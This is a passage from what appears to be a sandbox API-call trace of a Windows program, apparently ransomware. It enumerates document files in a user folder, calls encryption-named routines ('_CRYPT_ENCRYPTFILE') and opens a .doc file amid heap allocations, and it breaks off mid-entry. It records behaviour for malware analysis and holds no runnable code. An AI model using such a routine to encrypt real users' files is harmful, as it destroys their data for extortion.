xQmykruQi.xlsx|7QJQVMK.csv|cYT5WT.odt|eY_Dc1TDsg.pdf|g_XT5mjGuHk8Nmh4F.pptx|hR3cojo6WftWpyW3h.odt|IVMtcxmHJDptt31P9OCD.xls|IWVSvvMxlOfdD1.ods|Ko5KMbWIjv.pdf|sAJ5q4Jpz7.csv", cchCount1=201, lpString2="", cchCount2=0) returned 3 [0078.590] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ddc140, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x3766f560, ftLastAccessTime.dwHighDateTime=0x1d5efae, ftLastWriteTime.dwLowDateTime=0x3766f560, ftLastWriteTime.dwHighDateTime=0x1d5efae, nFileSizeHigh=0x0, nFileSizeLow=0x23b6, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="1ft lPPb9LICRxn6.doc", cAlternateFileName="1FTLPP~1.DOC")) returned 0x41ac500 [0078.590] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0078.590] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.591] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.591] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.591] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\1ft lppb9licrxn6.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0078.591] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.592] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0078.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0078.592] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.594] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0078.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0078.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.595] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0078.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.595] CloseHandle (hObject=0x298) returned 1 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.596] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.597] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0078.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0078.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0078.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0078.598] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0078.598] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0078.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.600] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 